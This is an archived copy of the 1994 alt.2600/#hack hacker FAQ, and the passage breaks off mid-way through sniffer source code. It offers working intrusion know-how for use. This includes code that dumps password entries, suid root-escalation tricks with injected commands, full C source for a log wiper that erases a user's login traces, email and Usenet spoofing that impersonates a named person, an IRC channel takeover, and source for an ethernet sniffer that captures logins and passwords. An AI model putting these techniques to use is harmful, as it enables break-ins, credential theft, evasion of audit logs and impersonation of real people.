home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / HACK2600.ZIP / 2600.FAQ < prev    next >
Text File  |  1994-11-23  |  138KB  |  4,208 lines

  1. -----------------------------------------------------------------------------
  2. -                                                                           -
  3. - This Phile passed trough DATA-CRIME BBS the bbs with the real information!-
  4. -                         +32.2.5236514 (24/24)                             -
  5. -                             Give us a beep !                              -
  6. -                             Traders welcome                               -
  7. -----------------------------------------------------------------------------
  8.                  
  9.                  
  10.                  ** BETA **
  11.  
  12.                  Beta Revision .008
  13.  
  14.                 alt.2600/#Hack F.A.Q.
  15.  
  16.                     by
  17.                   Voyager
  18.                 will@gnu.ai.mit.edu
  19.  
  20.                 Sysop of
  21.                  Hacker's Haven
  22.                   (303)343-4053
  23.  
  24.                With special thanks to:
  25.  
  26.      A-Flat, Al, Aleph1, Bluesman, C-Curve, Edison, KCrow, Major,
  27.      Presence, Rogue Agent, sbin, Taran King, Tomes and TheSaint.
  28.  
  29.  
  30.                We work in the dark
  31.                We do what we can
  32.                We give what we have
  33.                Our doubt is our passion,
  34.                and our passion is our task
  35.                The rest is the madness of art.
  36.  
  37.                 -- Henry James
  38.  
  39.  
  40.  
  41. Section A: Computers
  42.  
  43.   01. How do I access the password file under Unix?
  44.   02. How do I crack Unix passwords?
  45.   03. What is password shadowing?
  46. N 04. Where can I find the password file if it's shadowed?
  47.   05. What is NIS/yp?
  48. N 06. What are those weird characters after the comma in my passwd file?
  49.   07. How do I access the password file under VMS?
  50.   08. How do I crack VMS passwords?
  51.   09. How do I break out of a restricted shell?
  52.   10. How do I gain root from a suid script or program?
  53.   11. How do I erase my presence from the system logs?
  54.   12. How do I send fakemail?
  55.   13. How do I fake posts to UseNet?
  56.   14. How do I hack ChanOp on IRC?
  57.   15. How do I modify the IRC client to hide my real username?
  58.   16. How to I change to directories with strange characters in them?
  59. U 17. What is ethernet sniffing?
  60.   18. What is an Internet Outdial?
  61.   19. What are some Internet Outdials?
  62. U 20. What is this system?
  63. U 21. What are the default accounts for XXX ?
  64. U 22. What port is XXX on?
  65.   23. What is a trojan/worm/virus/logic bomb?
  66.   24. How can I protect myself from virii and such?
  67.   25. What is Cryptoxxxxxxx?
  68.   26. What is PGP?
  69.   27. What is Tempest?
  70.   28. What is an anonymous remailer?
  71.   29. What are the addresses of some anonymous remailers?
  72.   30. How do I defeat copy protection?
  73.  
  74.  
  75. Section B: Telephony
  76.  
  77.   01. What is a Red Box?
  78.   02. How do I build a Red Box?
  79. U 03. Where can I get a 6.5536Mhz crystal?
  80.   04. Which payphones will a Red Box work on?
  81.   05. What is a Blue Box?
  82.   06. Do Blue Boxes still work?
  83.   07. What is a Black Box?
  84.   08. What do all the colored boxes do?
  85. N 09. What is an ANAC number?
  86. U 10. What is the ANAC number for my area?
  87.   11. What is a ringback number?
  88.   12. What is the ringback number for my area?
  89.   13. What is a loop?
  90.   14. What is a loop in my area?
  91. U 15. What is a CNA number?
  92.   16. What is the telephone company CNA number for my area?
  93. N 17. What are some numbers that always ring busy?
  94. N 18. What are some numbers that temporarily disconnect phone service?
  95.   19. What is scanning?
  96.   20. Is scanning illegal?
  97. U 21. Where can I purchase a lineman's handset?
  98.   22. What are the DTMF frequencies?
  99. N 23. What are all of the * codes?
  100. N 24. What frequencies do cordless phones operate on?
  101.  
  102.  
  103. Section C: Resources
  104.  
  105. U 01. What are some ftp sites of interest to hackers?
  106. U 02. What are some newsgroups of interest to hackers?
  107.   03. What are some telnet sites of interest to hackers?
  108.   04. What are some gopher sites of interest to hackers?
  109. U 05. What are some World wide Web (WWW) sites of interest to hackers?
  110.   06. What are some IRC channels of interest to hackers?
  111. U 07. What are some BBS's of interest to hackers?
  112.   08. What books are available on this subject?
  113.   09. What are some mailing lists of interest to hackers?
  114. U 10. What are some print magazines of interest to hackers?
  115.   11. What are some organizations of interest to hackers?
  116. N 12. Where can I purchase a magnetic stripe encoder/decoder?
  117.  
  118. Section D: 2600
  119.  
  120.   01. What is alt.2600?
  121.   02. What does "2600" mean?
  122.   03. Are there on-line versions of 2600 available?
  123.   04. I can't find 2600 at any bookstores.  What can I do?
  124. U 05. Why does 2600 cost more to subscribe to than to buy at a newsstand?
  125.  
  126.  
  127. Section E: Miscellaneous
  128.  
  129. U 01. What does XXX stand for?
  130.   02. How do I determine if I have a valid credit card number?
  131.   03. Where can I get a copy of the #hack FAQ?
  132. N 04. What are the ethics of hacking?
  133.  
  134.  
  135.  
  136. U == Updated since last release of the #hack FAQ
  137. N == New since last release of the #hack FAQ
  138.  
  139.  
  140.  
  141.  
  142. Section A: Computers
  143. ~~~~~~~~~~~~~~~~~~~~
  144.  
  145. 01. How do I access the password file under Unix?
  146.  
  147. In standard Unix the password file is /etc/passwd.  On a Unix system
  148. with either NIS/yp or password shadowing, much of the password data
  149. may be elsewhere.
  150.  
  151.  
  152. 02. How do I crack Unix passwords?
  153.  
  154. Contrary to popular belief, Unix passwords cannot be decrypted.  Unix
  155. passwords are encrypted with a one way function.  The login program
  156. encrypts the text you enter at the "password:" prompt and compares
  157. that encrypted string against the encrypted form of your password.
  158.  
  159. Password cracking software uses wordlists.  Each word in the wordlist
  160. is encrypted with each of the 4096 possible salt values and the
  161. results are compared to the encrypted form of the target password.
  162.  
  163. The best cracking program for Unix passwords is currently Crack by
  164. Alec Muffett.  For PC-DOS, the best package to use is currently
  165. CrackerJack.
  166.  
  167.  
  168. 03. What is password shadowing?
  169.  
  170. Password shadowing is a security system where the encrypted password
  171. field of /etc/password is replaced with a special token and the
  172. encrypted password is stored in a separate file which is not readable
  173. by normal system users.
  174.  
  175. To defeat password shadowing on many (but not all) systems, write a
  176. program that uses successive calls to getpwent() to obtain the
  177. password file.
  178.  
  179. Example:
  180.  
  181. #include <pwd.h>
  182. main()
  183. {
  184. struct passwd *p;
  185. while(p=getpwent())
  186. printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
  187. p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
  188. }
  189.  
  190.  
  191. 04. Where can I find the password file if it's shadowed?
  192.  
  193. Unix                  Path                            Token
  194. -----------------------------------------------------------------
  195. AIX 3                 /etc/security/passwd            !
  196.        or             /tcb/auth/files/<first letter   #
  197.                 of username>/<username>
  198. A/UX 3.0s             /tcb/files/auth/?/*
  199. BSD4.3-Reno           /etc/master.passwd              *
  200. ConvexOS 10           /etc/shadpw                     *
  201. ConvexOS 11           /etc/shadow                     *
  202. DG/UX                 /etc/tcb/aa/user/               *
  203. EP/IX                 /etc/shadow                     x
  204. HP-UX                 /.secure/etc/passwd             *
  205. IRIX 5                /etc/shadow                     x
  206. Linux 0.99            /etc/shadow                     *
  207. OSF/1                 /etc/passwd[.dir|.pag]          *
  208. SCO Unix #.2.x        /tcb/auth/files/<first letter   *
  209.                 of username>/<username>
  210. SunOS4.1+c2           /etc/security/passwd.adjunct    ##username
  211. SunOS 5.0             /etc/shadow
  212.               <optional NIS+ private secure maps/tables/whatever>
  213. System V Release 4.0  /etc/shadow                     x
  214. System V Release 4.2  /etc/security/* database
  215. Ultrix 4              /etc/auth[.dir|.pag]            *
  216. UNICOS                /etc/udb                        *
  217.  
  218.  
  219. 06. What is NIS/yp?
  220.  
  221. NIS (Network Information System) in the current name for what was once
  222. known as yp (Yellow Pages).  The purpose for NIS is to allow many
  223. machines on a network to share configuration information, including
  224. password data. NIS is not designed to promote system security.  If
  225. your system uses NIS you will have a very short /etc/passwd file with
  226. a line that looks like this:
  227.  
  228. +::0:0:::
  229.  
  230. To view the real password file use this command "ypcat passwd"
  231.  
  232.  
  233. 05. What are those weird characters after the comma in my passwd file?
  234.  
  235. The characters are password aging data.  Password aging forces the
  236. user to change passwords after a System Administrator specified period
  237. of time.  Password aging can also force a user to keep a password for
  238. a certain number of weeks before changing it.
  239.  
  240. ]
  241. ] Sample entry from /etc/passwd with password aging installed:
  242. ]
  243. ] will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash
  244. ]
  245.  
  246. Note the comma in the encrypted password field.  The characters after
  247. the comma are used by the password aging mechanism.
  248.  
  249. ]
  250. ] Password aging characters from above example:
  251. ]
  252. ] M.z8
  253. ]
  254.  
  255. The four characters are interpreted as follows:
  256.  
  257.   1: Maximum number of weeks a password can be used without changing.
  258.   2: Minimum number of weeks a password must be used before changing.
  259. 3&4: Last time password was changed, in number of weeks since 1970.
  260.  
  261. Three special cases should be noted:
  262.  
  263. If the first and second characters are set to '..' the user will be
  264. forced to change his/her passwd the next time he/she logs in.  The
  265. passwd program will then remove the passwd aging characters, and the
  266. user will not be subjected to password aging requirements again.
  267.  
  268. If the third and fourth characters are set to '..' the user will be
  269. forced to change his/her passwd the next time he/she logs in. Password
  270. aging will then occur as defined by the first and second characters.
  271.  
  272. If the first character (MAX) is less than the second character (MIN),
  273. the user is not allowed to change his/her password.  Only root can
  274. change that users password.
  275.  
  276. It should also be noted that the su command does not check the password
  277. aging data.  An account with an expired password can be su'd to
  278. without being forced to change the password.
  279.  
  280.  
  281.             Password Aging Codes
  282. +------------------------------------------------------------------------+
  283. |                                                                        |
  284. | Character:  .  /  0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  G  H |
  285. |    Number:  0  1  2  3  4  5  6  7  8  9 10 11 12 13 14 15 16 17 18 19 |
  286. |                                                                        |
  287. | Character:  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  a  b |
  288. |    Number: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
  289. |                                                                        |
  290. | Character:  c  d  e  f  g  h  i  j  k  l  m  n  o  p  q  r  s  t  u  v |
  291. |    Number: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
  292. |                                                                        |
  293. | Character:  w  x  y  z                                                 |
  294. |    Number: 60 61 62 63                                                 |
  295. |                                                                        |
  296. +------------------------------------------------------------------------+
  297.  
  298.  
  299. 07. How do I access the password file under VMS?
  300.  
  301. Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT.  However,
  302. unlike Unix, most users do not have access to read the password file.
  303.  
  304.  
  305. 08. How do I crack VMS passwords?
  306.  
  307. Write a program that uses the SYS$GETUAF functions to compare the
  308. results of encrypted words against the encrypted data in SYSUAF.DAT.
  309.  
  310. Two such programs are known to exist, CHECK_PASSWORD and
  311. GUESS_PASSWORD.
  312.  
  313.  
  314. 09. How do I break out of a restricted shell?
  315.  
  316. On poorly implemented restricted shells you can break out of the
  317. restricted environment by running a program that features a shell
  318. function.  A good example is vi.  Run vi and use this command:
  319.  
  320. :set shell=/bin/sh
  321.  
  322. then shell using this command:
  323.  
  324. :shell
  325.  
  326.  
  327. 10. How do I gain root from a suid script or program?
  328.  
  329. 1. Change IFS.
  330.  
  331. If the program calls any other programs using the system() function
  332. call, you may be able to fool it by changing IFS.  IFS is the Internal
  333. Field Separator that the shell uses to delimit arguments.
  334.  
  335. If the program contains a line that looks like this:
  336.  
  337. system("/bin/date")
  338.  
  339. and you change IFS to '/' the shell will them interpret the
  340. proceeding line as:
  341.  
  342. bin date
  343.  
  344. Now, if you have a program of your own in the path called "bin" the
  345. suid program will run your program instead of /bin/date.
  346.  
  347. To change IFS, use this command:
  348.  
  349. IFS='/';export IFS      # Bourne Shell
  350. setenv IFS '/'          # C Shell
  351. export IFS='/'          # Korn Shell
  352.  
  353.  
  354. 2. link the script to -i
  355.  
  356. Create a symbolic link named "-i" to the program.  Running "-i"
  357. will cause the interpreter shell (/bin/sh) to start up in interactive
  358. mode.  This only works on suid shell scripts.
  359.  
  360. Example:
  361.  
  362. % ln suid.sh -i
  363. % -i
  364. #
  365.  
  366.  
  367. 3. Exploit a race condition
  368.  
  369. Replace a symbolic link to the program with another program while the
  370. kernel is loading /bin/sh.
  371.  
  372. Example:
  373.  
  374. nice -19 suidprog ; ln -s evilprog suidroot
  375.  
  376.  
  377. 4. Send bad input to the program.
  378.  
  379. Invoke the name of the program and a separate command on the same
  380. command line.
  381.  
  382. Example:
  383.  
  384. suidprog ; id
  385.  
  386.  
  387. 11. How do I erase my presence from the system logs?
  388.  
  389. Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text
  390. files that can be edited by hand with vi, you must use a program
  391. specifically written for this purpose.
  392.  
  393. Example:
  394.  
  395. #include <sys/types.h>
  396. #include <stdio.h>
  397. #include <unistd.h>
  398. #include <sys/file.h>
  399. #include <fcntl.h>
  400. #include <utmp.h>
  401. #include <pwd.h>
  402. #include <lastlog.h>
  403. #define WTMP_NAME "/usr/adm/wtmp"
  404. #define UTMP_NAME "/etc/utmp"
  405. #define LASTLOG_NAME "/usr/adm/lastlog"
  406.  
  407. int f;
  408.  
  409. void kill_utmp(who)
  410. char *who;
  411. {
  412.     struct utmp utmp_ent;
  413.  
  414.   if ((f=open(UTMP_NAME,O_RDWR))>=0) {
  415.      while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
  416.        if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  417.          bzero((char *)&utmp_ent,sizeof( utmp_ent ));
  418.          lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
  419.          write (f, &utmp_ent, sizeof (utmp_ent));
  420.         }
  421.      close(f);
  422.   }
  423. }
  424.  
  425. void kill_wtmp(who)
  426. char *who;
  427. {
  428.     struct utmp utmp_ent;
  429.     long pos;
  430.  
  431.     pos = 1L;
  432.     if ((f=open(WTMP_NAME,O_RDWR))>=0) {
  433.  
  434.      while(pos != -1L) {
  435.     lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
  436.     if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
  437.       pos = -1L;
  438.     } else {
  439.       if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  440.            bzero((char *)&utmp_ent,sizeof(struct utmp ));
  441.            lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
  442.            write (f, &utmp_ent, sizeof (utmp_ent));
  443.            pos = -1L;
  444.       } else pos += 1L;
  445.     }
  446.      }
  447.      close(f);
  448.   }
  449. }
  450.  
  451. void kill_lastlog(who)
  452. char *who;
  453. {
  454.     struct passwd *pwd;
  455.     struct lastlog newll;
  456.  
  457.      if ((pwd=getpwnam(who))!=NULL) {
  458.  
  459.     if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
  460.         lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
  461.         bzero((char *)&newll,sizeof( newll ));
  462.         write(f, (char *)&newll, sizeof( newll ));
  463.         close(f);
  464.     }
  465.  
  466.     } else printf("%s: ?\n",who);
  467. }
  468.  
  469. main(argc,argv)
  470. int argc;
  471. char *argv[];
  472. {
  473.     if (argc==2) {
  474.     kill_lastlog(argv[1]);
  475.     kill_wtmp(argv[1]);
  476.     kill_utmp(argv[1]);
  477.     printf("Zap2!\n");
  478.     } else
  479.     printf("Error.\n");
  480. }
  481.  
  482.  
  483. 12. How do I send fakemail?
  484.  
  485. Telnet to port 25 of the machine you want the mail to appear to
  486. originate from.  Enter your message as in this example:
  487.  
  488.  HELO bellcore.com
  489.  MAIL FROM:Voyager@bellcore.com
  490.  RCPT TO:president@whitehouse.gov
  491.  DATA
  492.  
  493.     Please discontinue your silly Clipper initiative.
  494.  .
  495.  QUIT
  496.  
  497. On systems that have RFC 931 implemented, spoofing your "MAIL FROM:"
  498. line will not work.  Test by sending yourself fakemail first.
  499.  
  500.  
  501. 13. How do I fake posts to UseNet?
  502.  
  503. Use inews to post.  Give inews the following lines:
  504.  
  505.  From:
  506.  Newsgroups:
  507.  Subject:
  508.  Message-ID:
  509.  Date:
  510.  Organization:
  511.  
  512. For a moderated newsgroup, inews will also require this line:
  513.  
  514.  Approved:
  515.  
  516. Then add your post and terminate with <Control-D>.
  517.  
  518. Example:
  519.  
  520.  From: Eric S. Real
  521.  Newsgroups: alt.hackers
  522.  Subject: Pathetic bunch of wannabe losers
  523.  Message-ID: <esr.123@locke.ccil.org>
  524.  Date: Fri, 13 Aug 1994 12:15:03
  525.  Organization: Moral Majority
  526.  
  527.  A pathetic bunch of wannabe losers is what most of you are, with no
  528.  right to steal the honorable title of `hacker' to puff up your silly
  529.  adolescent egos. Get stuffed, get lost, and go to jail.
  530.  
  531.                     Eric S. Raymond <esr@locke.ccil.org>
  532.  
  533.  
  534.  ^D
  535.  
  536. Note that many systems will append an Originator: line to your message
  537. header, effectively revealing the account from which the message was
  538. posted.
  539.  
  540.  
  541. 14. How do I hack ChanOp on IRC?
  542.  
  543. Find a server that is split from the rest of IRC and create your own
  544. channel there using the name of the channel you want ChanOp on.  When
  545. that server reconnects to the net, you will have ChanOp on the real
  546. channel.  If you have ServerOp on a server, you can cause it to split
  547. on purpose.
  548.  
  549.  
  550. 15. How do I modify the IRC client to hide my real username?
  551.  
  552. Get the IRC client from cs.bu.edu /irc/clients.  Look at the source
  553. code files irc.c and ctcp.c.  The code you are looking for is fairly
  554. easy to spot.  Change it. Change the username code in irc.c and the
  555. ctcp information code in ctcp.c.  Compile and run your client.
  556.  
  557. Here are the diffs from a sample hack of the IRC client.  Your client
  558. code will vary slightly depending on what IRC client version you are
  559. running.
  560.  
  561. *** ctcp.c.old  Wed Feb 10 10:08:05 1993
  562. --- ctcp.c      Fri Feb 12 04:33:55 1993
  563. ***************
  564. *** 331,337 ****
  565.     struct  passwd  *pwd;
  566.     long    diff;
  567.     int     uid;
  568. !       char    c;
  569.   
  570.     /*
  571.      * sojge complained that ircII says 'idle 1 seconds'
  572. --- 331,337 ----
  573.     struct  passwd  *pwd;
  574.     long    diff;
  575.     int     uid;
  576. !       char    c, *fing;
  577.   
  578.     /*
  579.      * sojge complained that ircII says 'idle 1 seconds'
  580. ***************
  581. *** 348,354 ****
  582.     if (uid != DAEMON_UID)
  583.     {
  584.   #endif /* DAEMON_UID */       
  585. !               if (pwd = getpwuid(uid))
  586.         {
  587.             char    *tmp;
  588.   
  589. --- 348,356 ----
  590.     if (uid != DAEMON_UID)
  591.     {
  592.   #endif /* DAEMON_UID */       
  593. !               if (fing = getenv("IRCFINGER"))
  594. !                       send_ctcp_reply(from, ctcp->name, fing, diff, c);
  595. !               else if (pwd = getpwuid(uid))
  596.         {
  597.             char    *tmp;
  598.   
  599. *** irc.c.old   Wed Feb 10 06:33:11 1993
  600. --- irc.c       Fri Feb 12 04:02:11 1993
  601. ***************
  602. *** 510,516 ****
  603.         malloc_strcpy(&my_path, "/");
  604.     if (*realname == null(char))
  605.         strmcpy(realname, "*Unknown*", REALNAME_LEN);
  606. !       if (*username == null(char))
  607.     {
  608.         if (ptr = getenv("USER"))
  609.             strmcpy(username, ptr, NAME_LEN);
  610. --- 510,518 ----
  611.         malloc_strcpy(&my_path, "/");
  612.     if (*realname == null(char))
  613.         strmcpy(realname, "*Unknown*", REALNAME_LEN);
  614. !       if (ptr = getenv("IRCUSER"))
  615. !               strmcpy(username, ptr, NAME_LEN);
  616. !       else if (*username == null(char))
  617.     {
  618.         if (ptr = getenv("USER"))
  619.             strmcpy(username, ptr, NAME_LEN);
  620.  
  621.  
  622. 16. How to I change to directories with strange characters in them?
  623.  
  624. These directories are often used by people trying to hide information,
  625. most often warez (commercial software).
  626.  
  627. There are several things you can do to determine what these strange
  628. characters are.  One is to use the arguments to the ls command that
  629. cause ls to give you more information:
  630.  
  631. From the man page for ls:
  632.  
  633.     -F   Causes directories to be marked with a trailing ``/'',
  634.      executable files to be marked with a trailing ``*'', and
  635.      symbolic links to be marked with a trailing ``@'' symbol.
  636.  
  637.     -q   Forces printing of non-graphic characters in filenames as the
  638.      character ``?''.
  639.  
  640.     -b   Forces printing of non-graphic characters in the \ddd
  641.      notation, in octal.
  642.  
  643. Perhaps the most useful tool is to simply do an "ls -al filename" to
  644. save the directory of the remote ftp site as a file on your local
  645. machine.  Then you can do a "cat -t -v -e filename" too see exactly
  646. what those bizarre little characters are.
  647.  
  648. From the man page for cat:
  649.  
  650.     -v  Causes non-printing characters (with the exception of tabs,
  651.     newlines, and form feeds) to be displayed.  Control characters
  652.     are displayed as ^X (<Ctrl>x), where X is the key pressed with
  653.     the <Ctrl> key (for example, <Ctrl>m is displayed as ^M).  The
  654.     <Del> character (octal 0177) is printed as ^?.  Non-ASCII
  655.     characters (with the high bit set) are printed as M -x, where
  656.     x is the character specified by the seven low order bits.
  657.  
  658.     -t  Causes tabs to be printed as ^I and form feeds as ^L.  This
  659.     option is ignored if the -v option is not specified.
  660.  
  661.     -e  Causes a ``$'' character to be printed at the end of each line
  662.     (prior to the new-line).  This option is ignored if the -v
  663.     option is not set.
  664.  
  665. If the directory name includes a <SPACE> or a <TAB> you will need to
  666. enclose the entire directory name in quotes.  Example:
  667.  
  668. cd "..<TAB>"
  669.  
  670. On an IBM-PC, you may enter these special characters by holding down
  671. the <ALT> key and entering the decimal value of the special character
  672. on your numeric keypad.  When you release the <ALT> key, the special
  673. character should appear on your screen.  An ASCII chart can be very
  674. helpful.
  675.  
  676.  
  677. 17. What is ethernet sniffing?
  678.  
  679. Ethernet sniffing is listening (with software) to the raw ethernet
  680. device for packets that interest you.  When your software sees a
  681. packet that fits certain criteria, it logs it to a file.  The most
  682. common criteria for an interesting packet is one that contains words
  683. like "login" or "password."
  684.  
  685. Many ethernet sniffers are available, here are a few that may be on
  686. your system now:
  687.  
  688. OS              Sniffer
  689. ~~              ~~~~~~~
  690. HP/UX           nettl (monitor) & netfmt (display)
  691.         nfswatch        /* Available via anonymous ftp */
  692. Irix            nfswatch        /* Available via anonymous ftp */
  693. SunOS           etherfind
  694.         nfswatch        /* Available via anonymous ftp */
  695. Solaris         snoop
  696. DOS             ETHLOAD         /* Available via anonymous ftp */
  697.         LanWatch
  698.         The Gobbler
  699.         Netmon
  700.         Netzhack        /* mistress.informatik.unibw-muenchen.de */
  701.                 /* /pub/netzhack.mac */
  702.         LanPatrol
  703.         Netwatch
  704.  
  705. Here is source code for an ethernet sniffer:
  706.  
  707. /* Esniff.c */
  708.  
  709. #include <stdio.h>
  710. #include <ctype.h>
  711. #include <string.h>
  712.  
  713. #include <sys/time.h>
  714. #include <sys/file.h>
  715. #include <sys/stropts.h>
  716. #include <sys/signal.h>
  717. #include <sys/types.h>
  718. #include <sys/socket.h>
  719. #include <sys/ioctl.h>
  720.  
  721. #include <net/if.h>
  722. #include <net/nit_if.h>
  723. #include <net/nit_buf.h>
  724. #include <net/if_arp.h>
  725.  
  726. #include <netinet/in.h>
  727. #include <netinet/if_ether.h>
  728. #include <netinet/in_systm.h>
  729. #include <netinet/ip.h>
  730. #include <netinet/udp.h>
  731. #include <netinet/ip_var.h>
  732. #include <netinet/udp_var.h>
  733. #include <netinet/in_systm.h>
  734. #include <netinet/tcp.h>
  735. #include <netinet/ip_icmp.h>
  736.  
  737. #include <netdb.h>
  738. #include <arpa/inet.h>
  739.  
  740. #define ERR stderr
  741.  
  742. char    *malloc();
  743. char    *device,
  744.     *ProgName,
  745.     *LogName;
  746. FILE    *LOG;
  747. int     debug=0;
  748.  
  749. #define NIT_DEV     "/dev/nit"
  750. #define CHUNKSIZE   4096        /* device buffer size */
  751. int     if_fd = -1;
  752. int     Packet[CHUNKSIZE+32];
  753.  
  754. void Pexit(err,msg)
  755. int err; char *msg;
  756. { perror(msg);
  757.   exit(err); }
  758.  
  759. void Zexit(err,msg)
  760. int err; char *msg;
  761. { fprintf(ERR,msg);
  762.   exit(err); }
  763.  
  764. #define IP          ((struct ip *)Packet)
  765. #define IP_OFFSET   (0x1FFF)
  766. #define SZETH       (sizeof(struct ether_header))
  767. #define IPLEN       (ntohs(ip->ip_len))
  768. #define IPHLEN      (ip->ip_hl)
  769. #define TCPOFF      (tcph->th_off)
  770. #define IPS         (ip->ip_src)
  771. #define IPD         (ip->ip_dst)
  772. #define TCPS        (tcph->th_sport)
  773. #define TCPD        (tcph->th_dport)
  774. #define IPeq(s,t)   ((s).s_addr == (t).s_addr)
  775.  
  776. #define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))
  777.  
  778. #define MAXBUFLEN  (128)
  779. time_t  LastTIME = 0;
  780.  
  781. struct CREC {
  782.      struct CREC *Next,
  783.          *Last;
  784.      time_t  Time;              /* start time */
  785.      struct in_addr SRCip,
  786.             DSTip;
  787.      u_int   SRCport,           /* src/dst ports */
  788.          DSTport;
  789.      u_char  Data[MAXBUFLEN+2]; /* important stuff :-) */
  790.      u_int   Length;            /* current data length */
  791.      u_int   PKcnt;             /* # pkts */
  792.      u_long  LASTseq;
  793. };
  794.  
  795. struct CREC *CLroot = NULL;
  796.  
  797. char *Symaddr(ip)
  798. register struct in_addr ip;
  799. { register struct hostent *he =
  800.       gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);
  801.  
  802.   return( (he)?(he->h_name):(inet_ntoa(ip)) );
  803. }
  804.  
  805. char *TCPflags(flgs)
  806. register u_char flgs;
  807. { static char iobuf[8];
  808. #define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')
  809.  
  810.   SFL(0,TH_FIN, 'F');
  811.   SFL(1,TH_SYN, 'S');
  812.   SFL(2,TH_RST, 'R');
  813.   SFL(3,TH_PUSH,'P');
  814.   SFL(4,TH_ACK, 'A');
  815.   SFL(5,TH_URG, 'U');
  816.   iobuf[6]=0;
  817.   return(iobuf);
  818. }
  819.  
  820. char *SERVp(port)
  821. register u_int port;
  822. { static char buf[10];
  823.   register char *p;
  824.  
  825.    switch(port) {
  826.      case IPPORT_LOGINSERVER: p="rlogin"; break;
  827.      case IPPORT_TELNET:      p="telnet"; break;
  828.      case IPPORT_SMTP:        p="smtp"; break;
  829.      case IPPORT_FTP:         p="ftp"; break;
  830.      default: sprintf(buf,"%u",port); p=buf; break;
  831.    }
  832.    return(p);
  833. }
  834.  
  835. char *Ptm(t)
  836. register time_t *t;
  837. { register char *p = ctime(t);
  838.   p[strlen(p)-6]=0; /* strip " YYYY\n" */
  839.   return(p);
  840. }
  841.  
  842. char *NOWtm()
  843. { time_t tm;
  844.   time(&tm);
  845.   return( Ptm(&tm) );
  846. }
  847.  
  848. #define MAX(a,b) (((a)>(b))?(a):(b))
  849. #define MIN(a,b) (((a)<(b))?(a):(b))
  850.  
  851. /* add an item */
  852. #define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
  853.   register struct CREC *CLtmp = \
  854.     (struct CREC *)malloc(sizeof(struct CREC)); \
  855.   time( &(CLtmp->Time) ); \
  856.   CLtmp->SRCip.s_addr = SIP.s_addr; \
  857.   CLtmp->DSTip.s_addr = DIP.s_addr; \
  858.   CLtmp->SRCport = SPORT; \
  859.   CLtmp->DSTport = DPORT; \
  860.   CLtmp->Length = MIN(LEN,MAXBUFLEN); \
  861.   bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
  862.   CLtmp->PKcnt = 1; \
  863.   CLtmp->Next = CLroot; \
  864.   CLtmp->Last = NULL; \
  865.   CLroot = CLtmp; \
  866. }
  867.  
  868. register struct CREC *GET_NODE(Sip,SP,Dip,DP)
  869. register struct in_addr Sip,Dip;
  870. register u_int SP,DP;
  871. { register struct CREC *CLr = CLroot;
  872.  
  873.   while(CLr != NULL) {
  874.     if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
  875.     IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
  876.         break;
  877.     CLr = CLr->Next;
  878.   }
  879.   return(CLr);
  880. }
  881.  
  882. #define ADDDATA_NODE(CL,DATA,LEN) { \
  883.  bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
  884.  CL->Length += LEN; \
  885. }
  886.  
  887. #define PR_DATA(dp,ln) {    \
  888.   register u_char lastc=0; \
  889.   while(ln-- >0) { \
  890.      if(*dp < 32) {  \
  891.     switch(*dp) { \
  892.         case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
  893.             break; \
  894.         case '\r': \
  895.         case '\n': fprintf(LOG,"\n     : "); \
  896.             break; \
  897.         default  : fprintf(LOG,"^%c", (*dp + 64)); \
  898.             break; \
  899.     } \
  900.      } else { \
  901.     if(isprint(*dp)) fputc(*dp,LOG); \
  902.     else fprintf(LOG,"(%d)",*dp); \
  903.      } \
  904.      lastc = *dp++; \
  905.   } \
  906.   fflush(LOG); \
  907. }
  908.  
  909. void END_NODE(CLe,d,dl,msg)
  910. register struct CREC *CLe;
  911. register u_char *d;
  912. register int dl;
  913. register char *msg;
  914. {
  915.    fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
  916.    fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));
  917.    fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
  918.    fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",
  919.             NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);
  920.    fprintf(LOG," DATA: ");
  921.     { register u_int i = CLe->Length;
  922.       register u_char *p = CLe->Data;
  923.       PR_DATA(p,i);
  924.       PR_DATA(d,dl);
  925.     }
  926.  
  927.    fprintf(LOG,"\n-- \n");
  928.    fflush(LOG);
  929.  
  930.    if(CLe->Next != NULL)
  931.     CLe->Next->Last = CLe->Last;
  932.    if(CLe->Last != NULL)
  933.     CLe->Last->Next = CLe->Next;
  934.    else
  935.     CLroot = CLe->Next;
  936.    free(CLe);
  937. }
  938.  
  939. /* 30 mins (x 60 seconds) */
  940. #define IDLE_TIMEOUT 1800
  941. #define IDLE_NODE() { \
  942.   time_t tm; \
  943.   time(&tm); \
  944.   if(LastTIME<tm) { \
